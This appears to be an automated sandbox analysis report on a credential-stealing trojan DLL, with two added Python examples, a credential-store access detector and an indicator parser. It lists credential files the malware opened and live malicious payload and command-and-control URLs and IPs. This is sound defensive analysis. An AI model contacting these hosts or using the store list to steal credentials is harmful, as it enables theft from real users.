                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_036D41FA HeapFree,GetSystemTimeAsFileTime,HeapFree,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_036D3365 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_062881F1 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_036D6D78 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

                      Stealing of Sensitive Information

Yara match, file source type MEMORY (memory dumps):
00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp
0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp
00000002.00000003.322984868.000000000576C000.00000004.00000020.00020000.00000000.sdmp
00000002.00000003.274118654.0000000005968000.00000004.00000020.00020000.00000000.sdmp
00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp
00000002.00000003.274312246.0000000005968000.00000004.00000020.00020000.00000000.sdmp
00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp
00000002.00000003.274347577.0000000005968000.00000004.00000020.00020000.00000000.sdmp
00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp
00000025.00000002.472945195.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp
00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp
00000002.00000003.274283989.0000000005968000.00000004.00000020.00020000.00000000.sdmp
00000031.00000002.779796004.0000018282502000.00000004.00000001.00020000.00000000.sdmp
00000002.00000003.274051962.0000000005968000.00000004.00000020.00020000.00000000.sdmp
00000002.00000003.320061792.0000000005968000.00000004.00000020.00020000.00000000.sdmp
00000002.00000003.274249118.0000000005968000.00000004.00000020.00020000.00000000.sdmp
00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp
00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp
00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp
00000002.00000003.274172697.0000000005968000.00000004.00000020.00020000.00000000.sdmp
00000002.00000003.322240934.0000000005968000.00000004.00000020.00020000.00000000.sdmp
00000002.00000003.274335301.0000000005968000.00000004.00000020.00020000.00000000.sdmp
00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp
00000018.00000000.389053919.0000000000520000.00000040.80000000.00040000.00000000.sdmp
00000018.00000000.388260255.0000000000520000.00000040.80000000.00040000.00000000.sdmp
00000024.00000000.486983679.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp
00000002.00000002.443486378.00000000055EF000.00000004.00000020.00020000.00000000.sdmp
00000025.00000000.462400330.0000015723930000.00000040.80000000.00040000.00000000.sdmp
00000031.00000000.558152492.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp
00000025.00000000.459537251.0000015723930000.00000040.80000000.00040000.00000000.sdmp
00000024.00000000.477935242.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp
00000031.00000000.564931591.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp
00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp
00000025.00000000.457650173.0000015723930000.00000040.80000000.00040000.00000000.sdmp
0000002D.00000000.534482367.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp
00000024.00000000.471067441.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp
00000002.00000003.442564309.00000000052F9000.00000004.00000020.00020000.00000000.sdmp
0000002D.00000000.515611246.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp
00000031.00000000.554617664.0000018282CA0000.00000040.80000000.00040000.00000000.sdmp
0000002D.00000000.528687963.000001FFC4820000.00000040.80000000.00040000.00000000.sdmp
00000018.00000000.390009566.0000000000520000.00000040.80000000.00040000.00000000.sdmp
00000002.00000003.322078024.000000000586A000.00000004.00000020.00020000.00000000.sdmp
00000002.00000003.322135875.00000000058E9000.00000004.00000020.00020000.00000000.sdmp

Yara match, file source type MEMORYSTR (process memory space):
rundll32.exe PID: 2284
powershell.exe PID: 6680
control.exe PID: 7000
RuntimeBroker.exe PID: 4440
rundll32.exe PID: 5180
RuntimeBroker.exe PID: 4724
RuntimeBroker.exe PID: 4960

Yara match, file source type UNPACKEDPE:
2.3.rundll32.exe.52f94a0.10.raw.unpack
2.3.rundll32.exe.52f94a0.10.unpack
2.2.rundll32.exe.36d0000.0.unpack
2.3.rundll32.exe.586a4a0.0.unpack
2.3.rundll32.exe.5916b40.2.raw.unpack
2.3.rundll32.exe.586a4a0.0.raw.unpack
2.3.rundll32.exe.58e94a0.1.raw.unpack
The following accesses are made by explorer.exe, which the Behavior Graph shows as the process injected by control.exe rather than the sample's own rundll32.exe; they cover mail-client profile keys and the Chromium-based browsers' credential and cookie databases.

Source: C:\Windows\explorer.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\appdata\local\google\chrome\user data\default\login data
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\appData\local\microsoft\edge\user data\default\login data
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\appdata\local\google\chrome\user data\default\cookies
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\index
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_0
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_1
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_2
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\data_3
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000001
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000002
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000004
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000005
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000007
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000008
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000009
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_00000a
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_00000b
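The evidence above is the classic stealer pattern: one process that is neither a browser nor a mail client opens the Chrome and Edge "Login Data" and "Cookies" databases and the Outlook and Windows Live Mail profile keys. The following detection logic is an added example, not code from Joe Sandbox or from the report; it takes (process image, object opened) events such as Sysmon or EDR file and registry telemetry would provide, maps each object to a known credential store, and reports accesses by a process that does not own that store. The store patterns are derived from the paths on this page; the owner process names (chrome.exe, msedge.exe, outlook.exe, wlmail.exe) and the sample events are assumptions constructed for the example.

```python
"""Flag credential-store access by processes that do not own the store."""
import ntpath
import re
from collections import defaultdict

# Known stores: (name, pattern over the opened path or registry key,
# processes expected to open it). The owner sets are an assumption for this
# example; extend them for the applications in your own environment.
STORES = [
    ("chromium-login-data",
     re.compile(r"\\(google\\chrome|microsoft\\edge)\\user data\\[^\\]+\\login data$", re.I),
     {"chrome.exe", "msedge.exe"}),
    ("chromium-cookies",
     re.compile(r"\\(google\\chrome|microsoft\\edge)\\user data\\[^\\]+\\cookies$", re.I),
     {"chrome.exe", "msedge.exe"}),
    ("outlook-profile",
     re.compile(r"^HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion"
                r"\\Windows Messaging Subsystem\\Profiles\\", re.I),
     {"outlook.exe"}),
    ("windows-live-mail",
     re.compile(r"^HKEY_CURRENT_USER\\Software\\Microsoft\\Windows Live Mail$", re.I),
     {"wlmail.exe"}),
]


def classify(obj):
    """Return the credential-store name an opened path/key belongs to, or None."""
    for name, pattern, _owners in STORES:
        if pattern.search(obj):
            return name
    return None


def find_unowned_access(events):
    """Return [(image, store, obj)] for store accesses by non-owner processes."""
    owners = {name: o for name, _p, o in STORES}
    hits = []
    for image, obj in events:
        store = classify(obj)
        if store and ntpath.basename(image).lower() not in owners[store]:
            hits.append((image, store, obj))
    return hits


def stealer_candidates(events, min_stores=2):
    """Processes reaching into at least `min_stores` distinct stores they do not own."""
    per_process = defaultdict(set)
    for image, store, _obj in find_unowned_access(events):
        per_process[image].add(store)
    return {img: sorted(s) for img, s in per_process.items() if len(s) >= min_stores}


# Constructed events: the explorer.exe accesses listed in the report above,
# one of its Chrome cache reads (not a credential store), and a legitimate
# chrome.exe access as a negative control.
EVENTS = [
    (r"C:\Windows\explorer.exe", "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows Live Mail"),
    (r"C:\Windows\explorer.exe", "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion"
                                 "\\Windows Messaging Subsystem\\Profiles\\Outlook\\"),
    (r"C:\Windows\explorer.exe", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\f_000008"),
    (r"C:\Windows\explorer.exe", r"C:\Users\user\appdata\local\google\chrome\user data\default\login data"),
    (r"C:\Windows\explorer.exe", r"C:\Users\user\appData\local\microsoft\edge\user data\default\login data"),
    (r"C:\Windows\explorer.exe", r"C:\Users\user\appdata\local\google\chrome\user data\default\cookies"),
    (r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
]

if __name__ == "__main__":
    for image, store, obj in find_unowned_access(EVENTS):
        print(f"{image} -> {store}: {obj}")
    print(stealer_candidates(EVENTS))
```

Run stand-alone it lists the five explorer.exe accesses and reports explorer.exe as the single candidate touching four distinct stores; the cache read and the chrome.exe access are ignored. The two-store threshold in stealer_candidates is what separates this from a single misattributed access, such as a backup agent reading one browser profile.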

                      Remote Access Functionality

Yara match: the same memory dumps, process memory spaces and unpacked PE files listed under Stealing of Sensitive Information above (the two categories share an identical list of matches).
MITRE ATT&CK matrix, by tactic. A number in parentheses is the count the matrix shows next to that technique (signatures matched for this sample); techniques without a count are the matrix's standard cells that did not match.

Initial Access: Valid Accounts (1); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools; Compromise Software Supply Chain
Execution: Windows Management Instrumentation (11); Native API (2); Command and Scripting Interpreter (1); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell; Unix Shell
Persistence: Valid Accounts (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd
Privilege Escalation: Valid Accounts (1); Access Token Manipulation (1); Process Injection (813); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd
Defense Evasion: Obfuscated Files or Information (1); File Deletion (1); Rootkit (4); Masquerading (1); Valid Accounts (1); Access Token Manipulation (1); Virtualization/Sandbox Evasion (31); Process Injection (813); Rundll32 (1); Invalid Code Signature; Right-to-Left Override; Rename System Utilities
Credential Access: OS Credential Dumping (1); Credential API Hooking (3); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture; Keylogging
Discovery: System Time Discovery (1); Account Discovery (1); File and Directory Discovery (4); System Information Discovery (27); Query Registry (1); Security Software Discovery (111); Virtualization/Sandbox Evasion (31); Process Discovery (3); Application Window Discovery (1); System Owner/User Discovery (1); Remote System Discovery (11); System Network Configuration Discovery (3)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools; Taint Shared Content; Replication Through Removable Media; Component Object Model and Distributed COM
Collection: Archive Collected Data (11); Data from Local System (1); Email Collection (11); Credential API Hooking (3); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging; Screen Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol; Exfiltration Over Physical Medium; Exfiltration over USB
Command and Control: Ingress Tool Transfer (2); Encrypted Channel (2); Non-Application Layer Protocol (3); Application Layer Protocol (13); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols; DNS
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Data Encrypted for Impact (1); Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Behavior Graph (ID 620323; sample 2oCOO5LbPu.dll; start date 04/05/2022; architecture WINDOWS; score 100)

Whole-run DNS: 8.8.8.8.in-addr.arpa; 1.0.0.127.in-addr.arpa
Whole-run signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 9 other signatures

loaddll32.exe
  cmd.exe
    rundll32.exe
      network: 185.189.151.28 port 80 (local port 49761; AS-SOFTPLUSCH, Switzerland)
      signatures: System process connects to network (likely due to code injection or exploit); Writes to foreign memory regions; Allocates memory in foreign processes; 3 other signatures
      control.exe
        signatures: Changes memory attributes in foreign processes to executable or writable; Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; 4 other signatures
        explorer.exe (injected)
          network: 193.56.146.127 port 80 (local port 49823; LVLT-10753US); cabrioxmdes.at = 116.121.62.237 (local ports 49825, 49836, 49845; CJNET-ASCheiljedangCoIncKR, Korea Republic of); gamexperts.net
          signatures: System process connects to network (likely due to code injection or exploit); Tries to steal Mail credentials (via file / registry access); Changes memory attributes in foreign processes to executable or writable; 8 other signatures
          cmd.exe
            signatures: Uses ping.exe to sleep; Uses ping.exe to check the status of other devices and networks; Uses nslookup.exe to query domains
            PING.EXE (network: 192.168.2.1)
            conhost.exe
          cmd.exe
            nslookup.exe (DNS: 222.222.67.208.in-addr.arpa; resolver1.opendns.com; myip.opendns.com; signature: May check the online IP address of the machine)
            conhost.exe
          cmd.exe
            conhost.exe
          4 other processes
            conhost.exe
        rundll32.exe
mshta.exe
  powershell.exe
    signatures: Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); 2 other signatures
    csc.exe (dropped: C:\Users\user\AppData\Local\...\dyznokx3.dll, PE32)
      cvtres.exe
    csc.exe (dropped: C:\Users\user\AppData\Local\...\ykprd3xj.dll, PE32)
      cvtres.exe
    conhost.exe
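Reports like this one are most useful once their evidence rows are turned back into structured indicators, and the text export makes that awkward: the "Source" cell and the evidence cell of every signature row run together ("...explorer.exeFile opened: ..."), and each URL reputation row collapses to URL, score, scanner and label with no separators. The parser below is an added example, not Joe Sandbox's code; it recovers the cell boundaries from the shape of the text and buckets the results into indicator sets (malicious URLs and hosts, Yara-matched dumps and unpacked PEs, registry keys and files opened, per source process). It assumes the two scanner names seen on this page (Avira URL Cloud, URL Reputation) and that a source is either "Yara match", an executable path, or a list of memory dumps ending in ".sdmp"; the sample input is a handful of rows copied from this report.

```python
"""Split Joe Sandbox report text rows back into fields and collect indicators."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Source cell: 'Yara match', an executable path, or a memory-dump list ending
# in '.sdmp'. Evidence kind: a capitalised phrase that ends at ': '.
EVIDENCE_RE = re.compile(
    r"^Source: (?P<src>Yara match|.+?\.(?:exe|sdmp))"
    r"(?P<kind>[A-Z][A-Za-z ]*?): (?P<val>.+)$"
)
# URL verdict row. Only the scanner names on this page are listed; extend the
# alternation for others (assumption for the example).
URL_RE = re.compile(
    r"^(?P<url>https?://\S+?)(?P<score>\d{1,3})%"
    r"(?P<scanner>Avira URL Cloud|URL Reputation)(?P<label>\w+)$"
)
# Yara evidence value: '<dump, process space or unpack name>, type: <TYPE>'.
YARA_SRC_RE = re.compile(r"^(?P<name>.+), type: (?P<type>[A-Z]+)$")


def parse_evidence(line):
    """Return (source, kind, value) for a fused evidence row, else None."""
    m = EVIDENCE_RE.match(line.strip())
    return (m["src"], m["kind"], m["val"]) if m else None


def parse_url_verdict(line):
    """Return (url, score, scanner, label) for a URL verdict row, else None."""
    m = URL_RE.match(line.strip())
    return (m["url"], int(m["score"]), m["scanner"], m["label"]) if m else None


def extract_iocs(text):
    """Bucket indicators by evidence kind; URLs are kept only when labelled malware."""
    iocs = defaultdict(set)
    for line in text.splitlines():
        ev = parse_evidence(line)
        if ev:
            src, kind, val = ev
            ym = YARA_SRC_RE.match(val) if src == "Yara match" else None
            if ym:
                iocs["Yara " + ym["type"]].add(ym["name"])
            else:
                iocs[kind].add((src, val))
            continue
        uv = parse_url_verdict(line)
        if uv and uv[3] == "malware":
            url, _score, scanner, _label = uv
            iocs["Malicious URL"].add((scanner, url))
            iocs["Malicious host"].add((scanner, urlsplit(url).hostname))
    return iocs


# Constructed input: rows copied from this report in the shape the text
# export gives them (one benign URL row per scanner as negative controls).
SAMPLE_REPORT = r"""
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\explorer.exeFile opened: C:\Users\user\appdata\local\google\chrome\user data\default\login data
Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: explorer.exe, 0000001B.00000000.429230100.0000000000B50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
Source: Yara matchFile source: 2.2.rundll32.exe.36d0000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2284, type: MEMORYSTR
http://193.56.146.127/stilak32.rar100%Avira URL Cloudmalware
http://193.56.146.127/stilak64.rar100%Avira URL Cloudmalware
http://curlmyip.net0%Avira URL Cloudsafe
https://contoso.com/License0%URL Reputationsafe
"""

if __name__ == "__main__":
    for kind, items in sorted(extract_iocs(SAMPLE_REPORT).items()):
        print(kind)
        for item in sorted(items):
            print("   ", item)
```

The lazy source match followed by a capitalised kind is what makes the split unambiguous for the dump-list rows: the engine extends the source past each ".exe" or ".sdmp" until the text after it looks like an evidence kind ending in ": ". Rows that fit neither pattern (headings, the flattened ATT&CK matrix) are silently skipped rather than guessed at.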

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample
Source | Detection | Scanner | Label
2oCOO5LbPu.dll | 50% | ReversingLabs | Win32.Trojan.Zenpak
2oCOO5LbPu.dll | 100% | Joe Sandbox ML |

Dropped Files
No Antivirus matches

Unpacked PE Files
Source | Detection | Scanner | Label
2.2.rundll32.exe.36d0000.0.unpack | 100% | Avira | HEUR/AGEN.1245293

Domains
No Antivirus matches

URLs
Source | Detection | Scanner | Label
https://www.disneyplus.com/legal/your-california-privacy-rights | 0% | URL Reputation | safe
http://curlmyip.net | 0% | Avira URL Cloud | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
http://curlmyip.netJv1GYc8A8hCBIeVDfile://c: | 0% | Avira URL Cloud | safe
http://ns.adobp/ | 0% | Avira URL Cloud | safe
http://193.56.146.127/stilak32.rar | 100% | Avira URL Cloud | malware
http://constitution.org/usdeclar.txtC: | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
http://https://file://USER.ID%lu.exe/upd | 0% | Avira URL Cloud | safe
http://cabrioxmdes.at/images/V0NO_2B_2/BKtxKUyqNZPWTGW_2Fsb/gcra1vUcqfsugEwbqkg/clC4xOvGOnv1IfCbC3KpDN/55o4c2l5_2FQ5/A5h2Nudl/_2BMxe_2B5DeFfkUNA5tHFs/S3JUh8OxeK/2_2FH31SGSIQagA1v/1cdYZqzVHkrq/508837BCT1F/BqNIRlNPeT4DuE/7TejdrPxV03GXRoV_2Bn_/2BLetz9nfjFhAFKH/XzqzBZbDgeQBfEL/knvoVinzLGANv8j5GP/MiBxeoPgM/h0e0hiZpA4rDs4gKFEOR/z8BKZois5KcoiHgGkl6/XYwiOQ0Qo28lWHm/byQpQm.gif | 100% | Avira URL Cloud | malware
http://ns.adobe.cmg | 0% | Avira URL Cloud | safe
https://www.tiktok.com/legal/report/feedback | 0% | URL Reputation | safe
http://193.56.146.127/stilak64.rar | 100% | Avira URL Cloud | malware
http://crl.osofts/Microt0 | 0% | URL Reputation | safe
http://185.189.151.28/drew/ftkCw_2FHRlZ2H4Ez/kZzLPSWW1EjO/vrmRPaaHdKz/qSrMackZ3zyqc0/VWwRh_2FwCauXlH76SpSQ/WebWjWKotWlEjZol/i0khlMGcdRnqbLJ/HlNBrT1E6GXaxDAWHo/UE921lN_2/FjqHF75OT4VsLwnjVixS/PbEwWP4onYE8hLJvBBX/d_2BgNcvh2ZXGjR5_2FyXa/S5_2BQHrje5lp/MVCT87wg/yCb3LwnNfDTI2igwyNHJuPu/wEyNxQ1wIj/6Ok6nHxwE/MHgaOPodjh/7.jlk | 0% | Avira URL Cloud | safe
http://193.56.146.127/cook32.rar | 100% | Avira URL Cloud | malware
https://www.disneyplus.com/legal/privacy-policy | 0% | URL Reputation | safe
http://185.189.151.28/drew/j2JffNlXTHLPSjvkab/vvawbyEnZ/Hwlvs3aqIXBaZtIhRcgj/4HXnxsMpDrDAMvyWm_2/FmVqdMEPLr3zfDmaxNGUay/bz_2BSMy1l2QZ/EUwY7mKI/BhGCRzr1OkkgVWxbqU3mkVE/wA3v0qd0nJ/5B7wfgqElhGpmz3sa/_2F6sQ8OT_2B/8xTtmUQcdaG/oTkIYSJR4gLWwl/QQTNVlqw4bQdTnzAZ6CQ7/k1kym0P_2B_2FUsc/x2oonw84wvEvNXM/7_2BWWPnJGDR/PuJeNv7kx/T.jlk | 0% | Avira URL Cloud | safe
http://constitution.org/usdeclar.txt | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
http://cabrioxmdes.at/images/ycZgts7gGB1TTI_2BJ/kAFzWH5dO/EouFwEOlBnMQFd_2B9cm/hFllbR62yV2D6DpnFIT/1m7iL_2BNn_2FiW_2Fey46/UbiTO8_2BKiyZ/X_2Fw6C8/_2BYemffpjXv9AYl0VWdt5P/DII_2F9NDv/YDhvS6DNSnB9Ol87V/O37_2FvxkOTf/eEAAdQaaXJB/BDgwSc3qOdxCUN/5Mw_2FSE2hFdSZTrFlwZP/7mWxeoDw9vW5V8uP/HsY9e6csLMEHi74/FnD5yUP5tDxrs5O87k/gamDdyFb5/q42.bmp | 100% | Avira URL Cloud | malware
https://www.pango.co/privacy | 0% | URL Reputation | safe
https://disneyplus.com/legal. | 0% | URL Reputation | safe
http://185.189.151.28/drew/VaQ3pTys7Q2R6kpf/_2FIc_2F8CXvB3Z/iOcDCMv_2Bzt_2BkvD/0oAvhggmG/_2Fl1lo2G6zaBPziefOU/0weuiBbGeNMoLKM6iCO/t_2BCeHyFsnS9bYnhwNoEp/71L2csZUwuj6M/Di72h_2F/YKcRH2nZoqJfjSIVybnSQum/ojRn6CbyHg/HZSkJJ16taI_2BtJ_/2BPgmXmwBiuC/GeqX1VmOJwL/BLm5b43yKc8DM1/cAyjDLhuSh3YL8e2h3G86/An0inHEid52NS1pJ/fzGWg5Z6i/S.jlk | 0% | Avira URL Cloud | safe
http://ns.adobe.ux | 0% | Avira URL Cloud | safe
http://193.56.146.127/cook64.rar | 100% | Avira URL Cloud | malware
http://ns.micro/1 | 0% | Avira URL Cloud | safe
http://help.disneyplus.com. | 0% | URL Reputation | safe
http://cabrioxmdes.at/images/x2n_2BZq/cMTCmy3PTwcmYJsQtcFfdmd/RGHbCfH0Mi/_2F2XXxRKDznMaDCu/6VijCL7TOw6A/_2FZwep2qr_/2FWEPkZM5AVXte/9aqioax34nJsL5Jif0tvs/L_2FZYT61ziDpxF7/LpFCetnlC9m_2Bt/oUT730x_2F0HUFQM3Y/XzNhPma_2/B16XqKLqfQsgSGMPR6I2/0aqjgbQwdUeD2pbxvCW/nFGCHfIsUA4BQ8wKgww64R/38SNs6vk5dFLz/lF2ZfIKN/ONI_2FioD0xOFaZ_2BUESxI/wtoW_2F78Wali9Dqxz_/2F8R.bmp | 100% | Avira URL Cloud | malware
Contacted Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
l-0007.l-dc-msedge.net | 13.107.43.16 | true | true | | unknown
cabrioxmdes.at | 116.121.62.237 | true | true | | unknown
myip.opendns.com | 102.129.143.40 | true | false | | high
resolver1.opendns.com | 208.67.222.222 | true | false | | high
gamexperts.net | unknown | unknown | true | | unknown
1.0.0.127.in-addr.arpa | unknown | unknown | true | | unknown
222.222.67.208.in-addr.arpa | unknown | unknown | true | | unknown
8.8.8.8.in-addr.arpa | unknown | unknown | true | | unknown
Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
http://193.56.146.127/stilak32.rar | true | Avira URL Cloud: malware | unknown
http://cabrioxmdes.at/images/V0NO_2B_2/BKtxKUyqNZPWTGW_2Fsb/gcra1vUcqfsugEwbqkg/clC4xOvGOnv1IfCbC3KpDN/55o4c2l5_2FQ5/A5h2Nudl/_2BMxe_2B5DeFfkUNA5tHFs/S3JUh8OxeK/2_2FH31SGSIQagA1v/1cdYZqzVHkrq/508837BCT1F/BqNIRlNPeT4DuE/7TejdrPxV03GXRoV_2Bn_/2BLetz9nfjFhAFKH/XzqzBZbDgeQBfEL/knvoVinzLGANv8j5GP/MiBxeoPgM/h0e0hiZpA4rDs4gKFEOR/z8BKZois5KcoiHgGkl6/XYwiOQ0Qo28lWHm/byQpQm.gif | true | Avira URL Cloud: malware | unknown
http://193.56.146.127/stilak64.rar | true | Avira URL Cloud: malware | unknown
http://185.189.151.28/drew/ftkCw_2FHRlZ2H4Ez/kZzLPSWW1EjO/vrmRPaaHdKz/qSrMackZ3zyqc0/VWwRh_2FwCauXlH76SpSQ/WebWjWKotWlEjZol/i0khlMGcdRnqbLJ/HlNBrT1E6GXaxDAWHo/UE921lN_2/FjqHF75OT4VsLwnjVixS/PbEwWP4onYE8hLJvBBX/d_2BgNcvh2ZXGjR5_2FyXa/S5_2BQHrje5lp/MVCT87wg/yCb3LwnNfDTI2igwyNHJuPu/wEyNxQ1wIj/6Ok6nHxwE/MHgaOPodjh/7.jlk | true | Avira URL Cloud: safe | unknown
http://193.56.146.127/cook32.rar | true | Avira URL Cloud: malware | unknown
http://185.189.151.28/drew/j2JffNlXTHLPSjvkab/vvawbyEnZ/Hwlvs3aqIXBaZtIhRcgj/4HXnxsMpDrDAMvyWm_2/FmVqdMEPLr3zfDmaxNGUay/bz_2BSMy1l2QZ/EUwY7mKI/BhGCRzr1OkkgVWxbqU3mkVE/wA3v0qd0nJ/5B7wfgqElhGpmz3sa/_2F6sQ8OT_2B/8xTtmUQcdaG/oTkIYSJR4gLWwl/QQTNVlqw4bQdTnzAZ6CQ7/k1kym0P_2B_2FUsc/x2oonw84wvEvNXM/7_2BWWPnJGDR/PuJeNv7kx/T.jlk | true | Avira URL Cloud: safe | unknown
http://cabrioxmdes.at/images/ycZgts7gGB1TTI_2BJ/kAFzWH5dO/EouFwEOlBnMQFd_2B9cm/hFllbR62yV2D6DpnFIT/1m7iL_2BNn_2FiW_2Fey46/UbiTO8_2BKiyZ/X_2Fw6C8/_2BYemffpjXv9AYl0VWdt5P/DII_2F9NDv/YDhvS6DNSnB9Ol87V/O37_2FvxkOTf/eEAAdQaaXJB/BDgwSc3qOdxCUN/5Mw_2FSE2hFdSZTrFlwZP/7mWxeoDw9vW5V8uP/HsY9e6csLMEHi74/FnD5yUP5tDxrs5O87k/gamDdyFb5/q42.bmp | true | Avira URL Cloud: malware | unknown
